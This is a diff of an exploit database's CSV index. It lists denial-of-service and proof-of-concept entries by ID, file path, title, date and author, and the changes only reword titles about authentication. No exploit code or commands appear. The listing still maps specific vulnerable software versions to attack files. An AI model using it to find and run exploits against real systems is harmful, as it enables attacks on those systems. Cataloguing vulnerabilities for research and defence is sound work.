(Authenticated) Remote Stack Overflow (PoC)",2008-05-31,securfrog,dos,windows, 5712,exploits/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",dos,multiple, 5718,exploits/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,dos,windows, 5727,exploits/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)",2008-06-02,securfrog,dos,windows, 5749,exploits/multiple/dos/5749.pl,"Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash",2008-06-05,"Armando Oliveira",dos,multiple, -5814,exploits/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",dos,linux, +5814,exploits/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption",2008-06-14,"Praveen Darshanam",dos,linux, 5817,exploits/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,dos,windows, 5843,exploits/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,dos,windows, 5851,exploits/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,dos,windows, 5918,exploits/windows/dos/5918.pl,"μTorrent (uTorrent) / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows, -5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow (Denial of Service) (PoC)",2008-06-30,"Travis Warren",dos,windows, +5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - (Authenticated) IMAP Remote Buffer Overflow (Denial of Service) (PoC)",2008-06-30,"Travis Warren",dos,windows, 6029,exploits/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",dos,multiple, 6043,exploits/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",dos,osx, 6046,exploits/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service (PoC)",2008-07-12,"Mu Security",dos,multiple, @@ -756,7 +756,7 @@ id,file,description,date,author,type,platform,port 6077,exploits/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server - Denial of Service",2008-07-15,Shinnok,dos,windows, 6083,exploits/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,dos,windows, 6090,exploits/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido Landi",dos,windows, -6101,exploits/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Unauthenticated Remote Denial of Service",2008-07-19,"Joxean Koret",dos,multiple, +6101,exploits/multiple/dos/6101.py,"Oracle Internet Directory 10.1.4 - Remote Denial of Service",2008-07-19,"Joxean Koret",dos,multiple, 6103,exploits/windows/dos/6103.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (PoC)",2008-07-21,"Guido Landi",dos,windows, 6120,exploits/minix/dos/6120.txt,"Minix 3.1.2a - Local TTY Panic (Denial of Service)",2008-07-23,kokanin,dos,minix, 6129,exploits/minix/dos/6129.txt,"Minix 3.1.2a - Remote TTY Panic (Denial of Service)",2008-07-25,kokanin,dos,minix, @@ -817,7 +817,7 @@ id,file,description,date,author,type,platform,port 6651,exploits/windows/dos/6651.pl,"vxFtpSrv 2.0.3 - 'CWD' Remote Buffer Overflow (PoC)",2008-10-02,"Julien Bedard",dos,windows, 6654,exploits/windows/dos/6654.pl,"mIRC 6.34 - Remote Buffer Overflow (PoC)",2008-10-02,securfrog,dos,windows, 6658,exploits/windows/dos/6658.txt,"VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service",2008-10-03,LiquidWorm,dos,windows, -6660,exploits/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service",2008-10-03,dmnt,dos,windows, +6660,exploits/windows/dos/6660.txt,"RhinoSoft Serv-U FTP Server 7.3 - (Authenticated) 'stou con:1' Denial of Service",2008-10-03,dmnt,dos,windows, 6668,exploits/windows/dos/6668.txt,"AyeView 2.20 - '.GIF' Image Local Crash",2008-10-04,suN8Hclf,dos,windows, 6671,exploits/windows/dos/6671.c,"Microsoft Windows Vista - Access Violation from Limited Account (Blue Screen of Death)",2008-10-04,Defsanguje,dos,windows, 6672,exploits/windows/dos/6672.txt,"AyeView 2.20 - Invalid Bitmap Header Parsing Crash",2008-10-05,suN8Hclf,dos,windows, @@ -827,7 +827,7 @@ id,file,description,date,author,type,platform,port 6716,exploits/windows/dos/6716.pl,"Microsoft Windows - GDI+ (PoC) (MS08-052) (2)",2008-10-09,"John Smith",dos,windows, 6717,exploits/windows/dos/6717.py,"WinFTP Server 2.3.0 - 'PASV Mode' Remote Denial of Service",2008-10-09,dmnt,dos,windows, 6718,exploits/linux/dos/6718.html,"Konqueror 3.5.9 - 'load' Remote Crash",2008-10-10,"Jeremy Brown",dos,linux, -6719,exploits/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Unauthenticated Denial of Service",2008-10-10,rAWjAW,dos,windows, +6719,exploits/windows/dos/6719.py,"Noticeware E-mail Server 5.1.2.2 - 'POP3' Denial of Service",2008-10-10,rAWjAW,dos,windows, 6726,exploits/hardware/dos/6726.txt,"Nokia Mini Map Browser - 'Array Sort' Silent Crash",2008-10-10,ikki,dos,hardware, 6732,exploits/windows/dos/6732.txt,"Microsoft Windows - InternalOpenColorProfile Heap Overflow (PoC) (MS08-046)",2008-10-12,Ac!dDrop,dos,windows, 6738,exploits/windows/dos/6738.py,"GuildFTPd 0.999.8.11/0.999.14 - Heap Corruption (PoC) / Denial of Service",2008-10-12,dmnt,dos,windows, @@ -838,9 +838,9 @@ id,file,description,date,author,type,platform,port 6756,exploits/windows/dos/6756.txt,"VideoLAN VLC Media Player 0.9.2 Media Player - XSPF Memory Corruption",2008-10-14,"Core Security",dos,windows, 6761,exploits/windows/dos/6761.html,"Hummingbird 13.0 - ActiveX Remote Buffer Overflow (PoC)",2008-10-16,"Thomas Pollet",dos,windows, 6775,exploits/solaris/dos/6775.c,"Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service",2008-10-17,"Federico L. Bossi Bonin",dos,solaris, -6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, +6800,exploits/windows/dos/6800.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, 6805,exploits/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",dos,multiple, -6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, +6812,exploits/windows/dos/6812.pl,"freeSSHd 1.2.1 - (Authenticated) SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",dos,windows, 6815,exploits/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",dos,windows, 6824,exploits/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",dos,windows, 6832,exploits/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,dos,windows, @@ -960,10 +960,10 @@ id,file,description,date,author,type,platform,port 8156,exploits/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption (PoC)",2009-03-04,Stack,dos,windows, 8163,exploits/bsd/dos/8163.txt,"Libc - 'libc:fts_*()' Local Denial of Service",2009-03-05,SecurityReason,dos,bsd, 8180,exploits/windows/dos/8180.c,"eZip Wizard 3.0 - Local Stack Buffer Overflow (PoC) (SEH)",2009-03-09,"fl0 fl0w",dos,windows, -8187,exploits/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,dos,hardware, +8187,exploits/hardware/dos/8187.sh,"Addonics NAS Adapter - (Authenticated) Denial of Service",2009-03-09,h00die,dos,hardware, 8190,exploits/windows/dos/8190.txt,"IBM Director 5.20.3su2 CIM Server - Remote Denial of Service",2009-03-10,"Bernhard Mueller",dos,windows, 8205,exploits/linux/dos/8205.pl,"JDKChat 1.5 - Remote Integer Overflow (PoC)",2009-03-12,n3tpr0b3,dos,linux, -8212,exploits/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' Authenticated Denial of Service",2009-03-16,"Jonathan Salwan",dos,windows, +8212,exploits/windows/dos/8212.pl,"RhinoSoft Serv-U FTP Server 7.4.0.1 - 'SMNT' (Authenticated) Denial of Service",2009-03-16,"Jonathan Salwan",dos,windows, 8213,exploits/windows/dos/8213.pl,"VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service",2009-03-16,TheLeader,dos,windows, 8219,exploits/multiple/dos/8219.html,"Mozilla Firefox 3.0.7 - OnbeforeUnLoad DesignMode Dereference Crash",2009-03-16,Skylined,dos,multiple, 8224,exploits/windows/dos/8224.pl,"WinAsm Studio 5.1.5.0 - Local Heap Overflow (PoC)",2009-03-16,Stack,dos,windows, @@ -1019,12 +1019,12 @@ id,file,description,date,author,type,platform,port 8465,exploits/windows/dos/8465.pl,"Microsoft Media Player - 'quartz.dll .mid' Denial of Service",2009-04-17,"Code Audit Labs",dos,windows, 8466,exploits/windows/dos/8466.pl,"Microsoft GDI Plugin - '.png' Infinite Loop Denial of Service (PoC)",2009-04-17,"Code Audit Labs",dos,windows, 8467,exploits/windows/dos/8467.pl,"Microsoft Media Player - 'quartz.dll .wav' Multiple Remote Denial of Service Vulnerabilities",2009-04-17,"Code Audit Labs",dos,windows, -8469,exploits/linux/dos/8469.c,"XRDP 0.4.1 - Unauthenticated Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",dos,linux, +8469,exploits/linux/dos/8469.c,"XRDP 0.4.1 - Remote Buffer Overflow (PoC)",2009-04-17,"joe walko",dos,linux, 8479,exploits/windows/dos/8479.html,"Microsoft Internet Explorer - EMBED Memory Corruption (PoC) (MS09-014)",2009-04-20,Skylined,dos,windows, 8484,exploits/windows/dos/8484.pl,"1by1 1.67 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, 8485,exploits/windows/dos/8485.pl,"Groovy Media Player 1.1.0 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, 8489,exploits/windows/dos/8489.pl,"CoolPlayer Portable 2.19.1 - '.m3u' Local Stack Overflow (PoC)",2009-04-20,GoLd_M,dos,windows, -8490,exploits/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' Authenticated Remote Denial of Service",2009-04-20,h00die,dos,hardware, +8490,exploits/hardware/dos/8490.sh,"Addonics NAS Adapter - 'bts.cgi' (Authenticated) Remote Denial of Service",2009-04-20,h00die,dos,hardware, 8500,exploits/windows/dos/8500.py,"Zervit Web Server 0.3 - Remote Denial of Service",2009-04-21,shinnai,dos,windows, 8507,exploits/windows/dos/8507.py,"Oracle RDBms 10.2.0.3/11.1.0.6 - TNS Listener (PoC)",2009-04-21,"Dennis Yurichev",dos,windows, 8511,exploits/windows/dos/8511.pl,"Xitami Web Server 5.0 - Remote Denial of Service",2009-04-22,"Jonathan Salwan",dos,windows, @@ -1090,7 +1090,7 @@ id,file,description,date,author,type,platform,port 9067,exploits/hardware/dos/9067.py,"ARD-9808 DVR Card Security Camera - GET Remote Denial of Service",2009-07-01,Stack,dos,hardware, 9071,exploits/multiple/dos/9071.txt,"Apple Safari 4.x - JavaScript Reload Remote Crash",2009-07-02,SkyOut,dos,multiple, 9084,exploits/windows/dos/9084.txt,"Soulseek 157 NS < 13e/156.x - Remote Peer Search Code Execution (PoC)",2009-07-09,"laurent gaffié",dos,windows, -9085,exploits/multiple/dos/9085.txt,"MySQL 5.0.45 - Authenticated COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,dos,multiple, +9085,exploits/multiple/dos/9085.txt,"MySQL 5.0.45 - (Authenticated) COM_CREATE_DB Format String (PoC)",2009-07-09,kingcope,dos,multiple, 9090,exploits/windows/dos/9090.pl,"otsAV DJ 1.85.064 - '.ofl' Local Heap Overflow (PoC)",2009-07-09,hack4love,dos,windows, 9100,exploits/windows/dos/9100.html,"Microsoft Internet Explorer - 'AddFavorite' Remote Crash (PoC)",2009-07-09,Sberry,dos,windows, 9102,exploits/windows/dos/9102.pl,"PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)",2009-07-10,Cyber-Zone,dos,windows, @@ -1198,7 +1198,7 @@ id,file,description,date,author,type,platform,port 9642,exploits/multiple/dos/9642.py,"FreeRadius < 1.1.8 - Zero-Length Tunnel-Password Denial of Service",2009-09-11,"Matthew Gillespie",dos,multiple,1812 9646,exploits/hardware/dos/9646.php,"Siemens Gigaset SE361 WLAN - Remote Reboot (Denial of Service)",2009-09-11,crashbrz,dos,hardware, 9657,exploits/windows/dos/9657.pl,"httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service",2009-09-14,"Pankaj Kohli",dos,windows, -9664,exploits/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - Authenticated Remote Denial of Service",2009-09-14,PLATEN,dos,windows, +9664,exploits/windows/dos/9664.py,"FtpXQ FTP Server 3.0 - (Authenticated) Remote Denial of Service",2009-09-14,PLATEN,dos,windows, 9666,exploits/hardware/dos/9666.php,"Apple Safari IPhone - using tel: Remote Crash",2009-09-14,cloud,dos,hardware, 9667,exploits/windows/dos/9667.c,"Cerberus FTP Server 3.0.3 - Remote Denial of Service",2009-09-14,"Single Eye",dos,windows, 9668,exploits/windows/dos/9668.txt,"Batch Picture Watemark 1.0 - '.jpg' Local Crash (PoC)",2009-09-14,the_Edit0r,dos,windows, @@ -1238,7 +1238,7 @@ id,file,description,date,author,type,platform,port 9971,exploits/windows/dos/9971.php,"Spider Solitaire - Denial of Service (PoC)",2009-10-15,SirGod,dos,windows, 9980,exploits/hardware/dos/9980.txt,"Websense Email Security - Denial of Service",2009-10-20,"Nikolas Sotiriu",dos,hardware, 9987,exploits/multiple/dos/9987.txt,"ZoIPer 2.22 - Call-Info Remote Denial of Service",2009-10-14,"Tomer Bitton",dos,multiple,5060 -9999,exploits/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Unauthenticated Denial of Service",2009-09-30,"Francis Provencher",dos,windows,21 +9999,exploits/windows/dos/9999.txt,"Cerberus FTP server 3.0.6 - Denial of Service",2009-09-30,"Francis Provencher",dos,windows,21 10004,exploits/multiple/dos/10004.txt,"Dopewars Server 1.5.12 - Denial of Service",2009-10-06,"Doug Prostko",dos,multiple,7902 10005,exploits/windows/dos/10005.py,"Microsoft Windows 7/2008 R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",dos,windows,445 10017,exploits/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",dos,linux, @@ -1255,7 +1255,7 @@ id,file,description,date,author,type,platform,port 10103,exploits/windows/dos/10103.txt,"Mozilla Thunderbird 2.0.0.23 Mozilla SeaMonkey 2.0 - 'jar50.dll' Null Pointer Dereference",2009-11-16,"Marcin Ressel",dos,windows, 10104,exploits/windows/dos/10104.py,"XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service",2009-11-13,zhangmc,dos,windows,21 10106,exploits/windows/dos/10106.c,"Avast! 4.8.1351.0 AntiVirus - 'aswMon2.sys' Kernel Memory Corruption",2009-11-17,Giuseppe,dos,windows, -10160,exploits/windows/dos/10160.py,"FtpXQ 3.0 - Authenticated Remote Denial of Service",2009-11-17,"Marc Doudiet",dos,windows,21 +10160,exploits/windows/dos/10160.py,"FtpXQ 3.0 - (Authenticated) Remote Denial of Service",2009-11-17,"Marc Doudiet",dos,windows,21 10163,exploits/windows/dos/10163.pl,"Novell eDirectory - HTTPSTK Login Stack Overflow",2009-11-17,karak0rsan,dos,windows,80 10164,exploits/windows/dos/10164.c,"Kaspersky AV 2010 9.0.0.463 - Local Denial of Service",2009-09-29,Heurs,dos,windows, 10171,exploits/windows/dos/10171.py,"Baby Web Server 2.7.2 - found Denial of Service",2009-11-18,"Asheesh kumar Mani Tripathi",dos,windows,80 @@ -1378,12 +1378,12 @@ id,file,description,date,author,type,platform,port 11332,exploits/windows/dos/11332.pl,"Opera 10.10 - Remote Code Execution Denial of Service",2010-02-05,cr4wl3r,dos,windows, 11338,exploits/windows/dos/11338.py,"X-lite SIP 3.0 - 'wav' memory Corruption Heap Buffer Overflow",2010-02-06,TecR0c,dos,windows, 11342,exploits/windows/dos/11342.txt,"SQLite Browser 2.0b1 - Local Denial of Service",2010-02-06,"Nishant Das Patnaik",dos,windows, -11343,exploits/windows/dos/11343.py,"httpdx 1.5.2 - Unauthenticated Remote Denial of Service (PoC)",2010-02-07,loneferret,dos,windows, +11343,exploits/windows/dos/11343.py,"httpdx 1.5.2 - Remote Denial of Service (PoC)",2010-02-07,loneferret,dos,windows, 11347,exploits/windows/dos/11347.html,"Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service",2010-02-07,"599eme Man",dos,windows, 11351,exploits/solaris/dos/11351.c,"Solaris/Open Solaris UCODE_GET_VERSION IOCTL - Denial of Service",2010-02-07,"Patroklos Argyroudis",dos,solaris, 11363,exploits/windows/dos/11363.c,"UltraISO 9.3.6.2750 - Local Buffer Overflow (PoC)",2010-02-09,"fl0 fl0w",dos,windows, 11374,exploits/windows/dos/11374.pl,"WM Downloader 3.0.0.9 - PLS WMDownloader (PoC)",2010-02-09,JIKO,dos,windows, -11391,exploits/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Unauthenticated Crash (PoC)",2010-02-10,loneferret,dos,windows, +11391,exploits/windows/dos/11391.py,"(Gabriel's FTP Server) Open & Compact FTPd 1.2 - Crash (PoC)",2010-02-10,loneferret,dos,windows, 11392,exploits/windows/dos/11392.c,"RadASM 2.2.1.6 - '.rap' Local Buffer Overflow (PoC)",2010-02-11,"fl0 fl0w",dos,windows, 11397,exploits/php/dos/11397.txt,"PHP Captcha Security Images - Denial of Service",2010-02-11,cp77fk4r,dos,php, 11407,exploits/windows/dos/11407.txt,"Core Impact 7.5 - Denial of Service",2010-02-11,"Beenu Arora",dos,windows,80 @@ -1393,8 +1393,8 @@ id,file,description,date,author,type,platform,port 11438,exploits/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",dos,windows, 11451,exploits/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' File Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,dos,windows, 11467,exploits/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",dos,ios, -11469,exploits/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,dos,windows, -11470,exploits/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,dos,windows, +11469,exploits/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - (Authenticated) Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,dos,windows, +11470,exploits/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - (Authenticated) Buffer Overflow (PoC)",2010-02-15,loneferret,dos,windows, 11472,exploits/ios/dos/11472.py,"iOS FTP On The Go 2.1.2 - HTTP Remote Denial of Service",2010-02-15,TecR0c,dos,ios, 11492,exploits/windows/dos/11492.html,"Rising Online Virus Scanner 22.0.0.5 - ActiveX Control Stack Overflow (Denial of Service)",2010-02-18,wirebonder,dos,windows, 11499,exploits/ios/dos/11499.pl,"iOS FileApp 1.7 - Remote Denial of Service",2010-02-18,Ale46,dos,ios, @@ -1436,15 +1436,15 @@ id,file,description,date,author,type,platform,port 11724,exploits/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,dos,windows, 11728,exploits/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,dos,windows, 14367,exploits/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",dos,multiple, -11734,exploits/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Unauthenticated Remote Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,dos,windows, -11736,exploits/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",dos,linux,389 +11734,exploits/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Denial of Service Vulnerabilities (PoC)",2010-03-14,loneferret,dos,windows, +11736,exploits/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",dos,linux,389 11763,exploits/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,dos,multiple, 11769,exploits/hardware/dos/11769.py,"iPhone Springboard - Malformed Character Crash (PoC)",2010-03-15,"Chase Higgins",dos,hardware, 11770,exploits/linux/dos/11770.txt,"WFTPD 3.3 - Remote REST Denial of Service",2010-03-16,dmnt,dos,linux,21 11792,exploits/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",dos,multiple, 11803,exploits/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,dos,windows, -11809,exploits/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,dos,windows,21 -11810,exploits/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Authenticated Multiple Crashs (SEH) (PoC)",2010-03-19,loneferret,dos,windows,21 +11809,exploits/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Denial of Service (PoC)",2010-03-19,loneferret,dos,windows,21 +11810,exploits/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - (Authenticated) Multiple Crashs (SEH) (PoC)",2010-03-19,loneferret,dos,windows,21 11827,exploits/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,dos,windows, 11838,exploits/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,dos,windows, 11839,exploits/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,dos,windows, @@ -1471,7 +1471,7 @@ id,file,description,date,author,type,platform,port 12011,exploits/windows/dos/12011.txt,"Google Chrome 4.1 - Out-of-Bounds Array Indexing",2010-04-02,"Tobias Klein",dos,windows, 12025,exploits/windows/dos/12025.php,"Dualis 20.4 - '.bin' Local Denial of Service",2010-04-03,"Yakir Wizman",dos,windows, 12027,exploits/windows/dos/12027.py,"DSEmu 0.4.10 - '.nds' Local Crash",2010-04-03,l3D,dos,windows, -12030,exploits/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticate) Buffer Overflow (PoC)",2010-04-03,d3b4g,dos,windows, +12030,exploits/windows/dos/12030.html,"IncrediMail 2.0 - ActiveX (Authenticated) Buffer Overflow (PoC)",2010-04-03,d3b4g,dos,windows, 12032,exploits/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control - ActiveX Remote Code Execution",2010-04-03,ZSploit.com,dos,windows, 12072,exploits/windows/dos/12072.pl,"MyVideoConverter 2.15 - Local Denial of Service",2010-04-05,anonymous,dos,windows, 12073,exploits/windows/dos/12073.pl,"MP3 Wav Editor 3.80 - '.mp3' Local Denial of Service",2010-04-05,anonymous,dos,windows, @@ -1565,7 +1565,7 @@ id,file,description,date,author,type,platform,port 12698,exploits/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,dos,windows, 12704,exploits/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - '.rm' Buffer Overflow (PoC)",2010-05-23,"sniper ip",dos,windows, 12740,exploits/windows/dos/12740.py,"Webby WebServer - Overflow (SEH) (PoC)",2010-05-25,m-1-k-3,dos,windows, -12741,exploits/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Unauthenticated Denial of Service",2010-05-25,Dr_IDE,dos,windows, +12741,exploits/windows/dos/12741.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Universal Denial of Service",2010-05-25,Dr_IDE,dos,windows, 12751,exploits/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, 12752,exploits/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, 12753,exploits/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,dos,windows, @@ -1890,7 +1890,7 @@ id,file,description,date,author,type,platform,port 16120,exploits/windows/dos/16120.py,"Hanso Player 1.4.0.0 - 'Skinfile' Buffer Overflow (Denial of Service)",2011-02-06,badc0re,dos,windows, 16121,exploits/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,dos,windows, 16129,exploits/linux/dos/16129.txt,"ProFTPd - 'mod_sftp' Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,dos,linux, -16166,exploits/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,dos,windows, +16166,exploits/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,dos,windows, 16150,exploits/windows/dos/16150.py,"XM Easy Personal FTP Server 5.8.0 - 'TYPE' Denial of Service",2011-02-10,"Houssam Sahli",dos,windows, 16180,exploits/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,dos,windows, 16182,exploits/linux/dos/16182.txt,"PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",dos,linux, @@ -1947,7 +1947,7 @@ id,file,description,date,author,type,platform,port 17145,exploits/windows/dos/17145.pl,"Vallen Zipper 2.30 - '.zip' Heap Overflow",2011-04-11,"C4SS!0 G0M3S",dos,windows, 17087,exploits/windows/dos/17087.pl,"Real player 14.0.2.633 - Buffer Overflow (Denial of Service) (PoC)",2011-04-01,^Xecuti0N3r,dos,windows, 17089,exploits/windows/dos/17089.pl,"GOM Media Player 2.1.6.3499 - Buffer Overflow (Denial of Service) (PoC)",2011-04-01,^Xecuti0N3r,dos,windows, -17097,exploits/bsd/dos/17097.c,"IPComp - encapsulation Unauthenticated Kernel Memory Corruption",2011-04-01,"Tavis Ormandy",dos,bsd, +17097,exploits/bsd/dos/17097.c,"IPComp - encapsulation Kernel Memory Corruption",2011-04-01,"Tavis Ormandy",dos,bsd, 17120,exploits/multiple/dos/17120.c,"GNU glibc < 2.12.2 - 'fnmatch()' Stack Corruption",2011-02-25,"Simon Berry-Byrne",dos,multiple, 17133,exploits/windows/dos/17133.c,"Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service",2011-04-08,"Lufeng Li",dos,windows, 17140,exploits/multiple/dos/17140.txt,"Libmodplug ReadS3M - Stack Overflow",2011-04-09,"SEC Consult",dos,multiple, @@ -2239,7 +2239,7 @@ id,file,description,date,author,type,platform,port 19385,exploits/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",dos,windows, 19117,exploits/bsd/dos/19117.c,"Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",dos,bsd, 19130,exploits/freebsd/dos/19130.c,"FreeBSD 3.0 - UNIX-domain Panic (Denial of Service)",1999-05-05,"Lukasz Luzar",dos,freebsd, -19137,exploits/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,dos,hardware, +19137,exploits/hardware/dos/19137.rb,"Wyse - Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,dos,hardware, 19413,exploits/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 